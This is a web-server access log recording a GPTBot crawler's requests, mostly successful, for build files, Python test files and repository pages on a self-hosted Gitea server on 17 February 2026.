"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11302] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21333] [Gzip 6.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14156] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11142] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" [Client 74.7.227.38] [Length 10887] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" +[17/Feb/2026:14:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" [Client 74.7.227.38] [Length 19732] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" +[17/Feb/2026:14:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17347] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" +[17/Feb/2026:14:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10858] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" +[17/Feb/2026:14:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" +[17/Feb/2026:14:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" [Client 74.7.227.38] [Length 9924] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" +[17/Feb/2026:14:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11065] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10230] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10661] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31146] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" +[17/Feb/2026:14:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" +[17/Feb/2026:14:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" +[17/Feb/2026:14:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" [Client 74.7.227.38] [Length 22467] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" +[17/Feb/2026:14:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/README.md" +[17/Feb/2026:14:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" [Client 74.7.227.38] [Length 9903] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" +[17/Feb/2026:14:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10002] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:55:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db" +[17/Feb/2026:14:55:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14346] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db" +[17/Feb/2026:14:55:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:55:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:55:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23040] [Gzip 10.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:55:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/my_database.db" +[17/Feb/2026:14:55:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10064] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18926] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" [Client 74.7.227.38] [Length 11798] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" +[17/Feb/2026:14:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" [Client 74.7.227.38] [Length 11770] [Gzip 2.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" +[17/Feb/2026:14:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14721] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:55:46 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11399] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" +[17/Feb/2026:14:55:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10221] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:55:47 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" +[17/Feb/2026:14:55:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest" +[17/Feb/2026:14:55:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" [Client 74.7.227.38] [Length 2186] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/keys.json" +[17/Feb/2026:14:55:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" [Client 74.7.227.38] [Length 2186] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/keys.json" +[17/Feb/2026:14:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" [Client 74.7.227.38] [Length 10557] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode/settings.json" +[17/Feb/2026:14:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 12767] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 